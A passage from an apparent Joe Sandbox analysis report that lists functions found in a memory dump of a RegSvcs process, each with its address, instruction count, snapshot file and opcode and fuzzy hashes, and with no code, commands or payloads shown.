                                            Function 0186208A Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction ID: f941e18da8a792595a88fcb19c608abf02dd3ad9a77d3197fd3cfd091b2ab291
                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction Fuzzy Hash: 9D0124322001118BEF119A2DD8C0B92BB6BBFC4700F1945E9EE05CF246DA71CE81C392
                                            Function 018E6050 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0b457b7f8f0444bd216682dc4e48edd3f8525a4f8c802ead557f6e7b15a9330
                                            • Instruction ID: d4ecda3610a5c3b0e7d47ba6cf6b607ad2fa24af1686d763cc9afab1bdfe9696
                                            • Opcode Fuzzy Hash: f0b457b7f8f0444bd216682dc4e48edd3f8525a4f8c802ead557f6e7b15a9330
                                            • Instruction Fuzzy Hash: F5111773900119ABCB11DB98CC84EDFBBBCEF58358F044166A906E7211EA34EB15CBA1
                                            Function 018F6500 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f99c0025bc7099b9835a09393aea04c8e22ce8e56362bcfe877106e90333c42a
                                            • Instruction ID: 877b8f4aab9d229ae6e37dfe497cc58c4cae913f2e0da5c5387a85d935462ad6
                                            • Opcode Fuzzy Hash: f99c0025bc7099b9835a09393aea04c8e22ce8e56362bcfe877106e90333c42a
                                            • Instruction Fuzzy Hash: 3711E5326041459FD301CF18C800BA1BBB5FB5A314F188259F944DF315E732ED40CBA0
                                            Function 018EC810 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52efd4615aa20d31042828ef8a79d5a70052bee14e4d99eb13a67dde788accf1
                                            • Instruction ID: 29f4710a8da88db159e3ac0c736c85bc394bafb281914a2a91125494f5e7a550
                                            • Opcode Fuzzy Hash: 52efd4615aa20d31042828ef8a79d5a70052bee14e4d99eb13a67dde788accf1
                                            • Instruction Fuzzy Hash: BD1118B1E00219ABCB00DFA9D545AAEBBF8FF58350F10406AA905E7351D774EA018BA5
                                            Function 018A20F0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8203a5ba126d412ece624a0a4d805a13d3c064414bc96813f5c2b9536b73ac5b
                                            • Instruction ID: 466aa4ed52e9689211a45cf2fd24a92e4dee2a4be3f892923662fa58bb712502
                                            • Opcode Fuzzy Hash: 8203a5ba126d412ece624a0a4d805a13d3c064414bc96813f5c2b9536b73ac5b
                                            • Instruction Fuzzy Hash: 1C11A975A0120DEBDF15EFA8C840BAE7BB6EB44340F104058E912EB280EB34EF11CB91
                                            Function 0185C020 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction ID: fbddf216bab3a1e5bef36acf53adfed7578db616b01bc6993c753a395d95d302
                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction Fuzzy Hash: 0A01B532100705AFEF2296A9C840EA777EDFFC5318F054519A956CB640DB74E642CF51
                                            Function 0189E5CF Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f6ab2d69f4428b259fb126f551ccb5c1e4bfa4ecdf6460adc996c5d0ab1958c
                                            • Instruction ID: 9c3fec8e487d062b9c4f7031ea18e83b0ce762bf4afa5fe8d922c64e49a821b3
                                            • Opcode Fuzzy Hash: 5f6ab2d69f4428b259fb126f551ccb5c1e4bfa4ecdf6460adc996c5d0ab1958c
                                            • Instruction Fuzzy Hash: 0501DF71600A02BBD311BB7DCD80E17BBACFB947A4B000629F609C3650DB24EE01C6A2
                                            Function 018F69C0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 128c7fcc0456b8eb44b7af93c9c1ece04701aa41e4232f509b4e79676fe23fd0
                                            • Instruction ID: 03fef3b48f64199764e51b388393d0eb275a7815291bdc89c47cd971acaf38d5
                                            • Opcode Fuzzy Hash: 128c7fcc0456b8eb44b7af93c9c1ece04701aa41e4232f509b4e79676fe23fd0
                                            • Instruction Fuzzy Hash: AC01D8322242069BD320DF6D8848966FBA8EB54764F61422DEA69C7180F7309A05C7E2
                                            Function 018EC460 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a248f150fc8b5d77ab4dcc5e2f6caa16461ac480bf3a5923d53bf9f65747f229
                                            • Instruction ID: a469728c16d933c52dbc66c0585a7c7fd0394cfd52ee66ac1b2d659f72388cd0
                                            • Opcode Fuzzy Hash: a248f150fc8b5d77ab4dcc5e2f6caa16461ac480bf3a5923d53bf9f65747f229
                                            • Instruction Fuzzy Hash: 6F115B71A0120DABDF15EF68C884EAE7FB5EB49344F004099BD01E7340DB34EA11DB91
                                            Function 018EC97C Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3657929af62613cf2b400e19a6600d0e2d607da8c8962d26f20654bd0163725b
                                            • Instruction ID: 6f5dbbdfcafb33afe205ffff91fa422b1620147f7d4b54af659bf59dfec8f82d
                                            • Opcode Fuzzy Hash: 3657929af62613cf2b400e19a6600d0e2d607da8c8962d26f20654bd0163725b
                                            • Instruction Fuzzy Hash: DC1179B1A083089FC700DF6DC441A5BBBE4EF99310F00451AB998D7391E730EA00CB92
                                            Function 01934A80 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction ID: 05bd773c9957aa4b579a32dd18253e286e8aec6d6bf6a95eb17b681cabbc4a78
                                            • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction Fuzzy Hash: 6501D4322046069FDB219A6DDC44F96BBEAFBC6210F094819E646CB650DAB4F882C794
                                            Function 018ECA11 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e94efa3a7b87615fa0f8380a9b95f381443fe52404ed9a3771d9fd9cadaf2daa
                                            • Instruction ID: 00fc647c373905e5cdb12f692b2451ee7586df9905fe470628466ad43a012e00
                                            • Opcode Fuzzy Hash: e94efa3a7b87615fa0f8380a9b95f381443fe52404ed9a3771d9fd9cadaf2daa
                                            • Instruction Fuzzy Hash: C21179B1A083089FC710DF6DC441A4BBBE4FF99350F00851AB958D73A0E730EA00CB92
                                            Function 0187E016 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction ID: b411c2c892eb6fd306a6b42176c81ec6d2f071d3d1dafcb7789cf3355fc0d9a5
                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction Fuzzy Hash: C6018F726015849FE323871DC948F667BE8FF4A758F0904A5FA09CBAA1D778DE40C622
                                            Function 0185826B Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64b698fbefa9bf158f53b96388c6771f686633feba7dbf60b9778d8321daf9f1
                                            • Instruction ID: 8cb7a047370db4cfdcddb6e10accbf28fbcbf9ea0ad9ff61769401011b60372e
                                            • Opcode Fuzzy Hash: 64b698fbefa9bf158f53b96388c6771f686633feba7dbf60b9778d8321daf9f1
                                            • Instruction Fuzzy Hash: 4801D4317006099FD714DB6ED8089AEBBE9EF82390F45402A9E01E7644DE70DB01C792
                                            Function 0190EB50 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fb9eea45d9c8c70232285f418815dfa40a384374507d3d58efe9b9cd71b729d8
                                            • Instruction ID: 7ec0c258b06e9982123ddb0a055e0ca5e6a923d629cf5fe8d23d23708d85ac83
                                            • Opcode Fuzzy Hash: fb9eea45d9c8c70232285f418815dfa40a384374507d3d58efe9b9cd71b729d8
                                            • Instruction Fuzzy Hash: 3801A271644B05AFD3329F1AD841F02BBA9EF55B90F154C2AB60AAF390D6B0D9408B95
                                            Function 01862582 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b7845f1d20365347721b99c4f17460042082adbf5daf7cb48df02dd85d01e11
                                            • Instruction ID: ee71ddd08c21afe5302af511ecdbde39b15bd9f353b000eb1ba93cefe36c8022
                                            • Opcode Fuzzy Hash: 3b7845f1d20365347721b99c4f17460042082adbf5daf7cb48df02dd85d01e11
                                            • Instruction Fuzzy Hash: EDF0F432741A10B7C7319B5A8C44F47BEAEEBC4B90F044428BA0AD7600CA30EE01DBA1
                                            Function 0188C073 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction ID: c9cd5079cc272a3e41bf13a6a912a93598a629c27e5a6c526ce1f1d0a6593404
                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction Fuzzy Hash: 14F0C2B3A00611ABE324DF4DDC40E57FBEADBD1B80F048528E645C7220EA31DE05CB90
                                            Function 0185C310 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction ID: 742d7a00d6f74a74f9bdaf5699a5dcdcba53a3b4f870090da07bdc5b9f5276f1
                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction Fuzzy Hash: BBF0FC732047279BD772175D4880BABA69DCFD1B65F190035EE05DB201CBA18F02AAD2
                                            Function 0193634F Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 223fd6b4d201873018a291af85cc49b2fe57edf69b9a599d9c5c73b7551182d7
                                            • Instruction ID: 9b040bd978760f3c2f4bf9eb0c841086bfe003b8b9de0b43dae67b6fc36d195e
                                            • Opcode Fuzzy Hash: 223fd6b4d201873018a291af85cc49b2fe57edf69b9a599d9c5c73b7551182d7
                                            • Instruction Fuzzy Hash: E1012C71A10209ABDB04DFA9D551AAEBBF8FF98304F10406AE905E7350D774AB019BA1
                                            Function 019362D6 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfefbb8c0e2248d5e1372088d59c4f532cb9c8d92e8a27bac591746c21502fa9
                                            • Instruction ID: 77b1873eeb627388e7ec705bff707a580f3e744a328e1974742e01680d68f8b6
                                            • Opcode Fuzzy Hash: bfefbb8c0e2248d5e1372088d59c4f532cb9c8d92e8a27bac591746c21502fa9
                                            • Instruction Fuzzy Hash: 38012C71A00209ABDB04DFA9D441AAEBBF8EF58344F50406AE915E7391D674AA018BA1
                                            Function 0193625D Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eff566488ef2f5bcecf98296efc35726325fc385b6a3ec055a689072128d0c11
                                            • Instruction ID: 2eeb4d8cbf71c25dea45eda5b7212f949119deed18bc43164080b7794d09ced6
                                            • Opcode Fuzzy Hash: eff566488ef2f5bcecf98296efc35726325fc385b6a3ec055a689072128d0c11
                                            • Instruction Fuzzy Hash: A6012C71A1020AABDB04DFA9D451AAEB7F8EF98304F50406AF905E7351D674AA018BA1
                                            Function 019361E5 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                            • Instruction ID: f541539b4d0a9250efba07bcc40c5c0ad247fcba488c9650e189be658450c5dd
                                            • Opcode Fuzzy Hash: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                            • Instruction Fuzzy Hash: B9014F71A01249ABDB04DFA9D445AEEBBF8BF58310F14405AE905F7280D774EB01CBA5
                                            Function 018E63C0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: 4bac27bb6d25efb3819fc61b818f0fe5e3ea1eb09c13702bc5d4c4139d08ef11
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 22F0FF7210001DBFEF019F94DD80DAF7BBDEB55398B104125BA1192160D631DE21A7A1
                                            Function 018EA4B0 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                            • Instruction ID: f64d59e0bfbc6bb539e0c7a67a192fe320514a3779c3bb38925d2cade4fbab60
                                            • Opcode Fuzzy Hash: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                            • Instruction Fuzzy Hash: 6F018536110219ABCF129E94D844EDA3FA6FB4CB64F068105FE18A6220C332DA70EB91
                                            Function 0185C0F0 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                            • Instruction ID: 0e851132294604f4865ad64e60ea3469b78a8180eac23ec83b8d43e79d3ad076
                                            • Opcode Fuzzy Hash: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                            • Instruction Fuzzy Hash: 1CF024B23847455BF7A4961D8C01B22329EE7C0791F29806AEF05CB2C1FB70DE018B94
                                            Function 0189656A Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                            • Instruction ID: dadc7ad04767b18bc3f4bc1aef6e5ebd560ee56288f1a326c236b424a6c58ed0
                                            • Opcode Fuzzy Hash: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                            • Instruction Fuzzy Hash: 2801AFB0204785DFFB369B6CCD48F293BE8BB40B04F5C0194BA11DBAD6EB78D6418612
                                            Function 0190437C Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: 5a034d6febbb33082e2a5bb292ffa7a196c94f26772b9bdd53c9c5326ecd65a2
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: D4F089353819134BEB77AA2D9A20B2EA75E9F90E52B09252C9759CB6C0DF60D8018791
                                            Function 018EC89D Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                            • Instruction ID: 808f48b97bbeac63213fb9f64ee200eba888f8933f48907c13422cb841ea83cf
                                            • Opcode Fuzzy Hash: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                            • Instruction Fuzzy Hash: F2F0AF716097049FD310EF28C945A1ABBE4FF98710F80465ABC98DB390E734EA00C797
                                            Function 018EE872 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: d0d06dd227a6457bcdb1ecbdcb8c25697f90fbc131315c068b8656a867901c4b
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: E7F082337116329BE3319A5ECC84F16B7E8EFD6B60F590165AA08DB264C760ED01D7D1
                                            Function 01890854 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 85fe59eb6f5cf158da96034bf3b856023b30145dd2f54c3914523e745d0fab61
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: BAF0B472614204EFE714DB25CC01F56B6EDEF98744F188478A945DB260FAB0DE01C654
                                            Function 018EC912 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                            • Instruction ID: 87b7550bc7849bb7931d0f69995e6686d7b4c0897ce5d2445af4838f86b325dd
                                            • Opcode Fuzzy Hash: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                            • Instruction Fuzzy Hash: 34F04F70A01249AFDB04EF69C515A5EB7F4EF18300F408055A955EB385DA78EB01CB61
                                            Function 018647FB Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                            • Instruction ID: 9c0ddda46cffb5a72c45fbd614b08842f9befc378f8a63cc33472d3401fde5d8
                                            • Opcode Fuzzy Hash: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                            • Instruction Fuzzy Hash: A1F052319023E4CFE733CBECC048B69BBCC9B48B34F08886AC589C7502CB24DA80C650
                                            Function 01920115 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                            • Instruction ID: 6439f90a311de9e9c9b2ad23502e3d155630b948e36504b3f5bfb804f254a280
                                            • Opcode Fuzzy Hash: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                            • Instruction Fuzzy Hash: 73F0277641A79506CB325B2C74602D16F78B782110F6D1485E8A87720FC6748483C320
                                            Function 0189C5ED Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
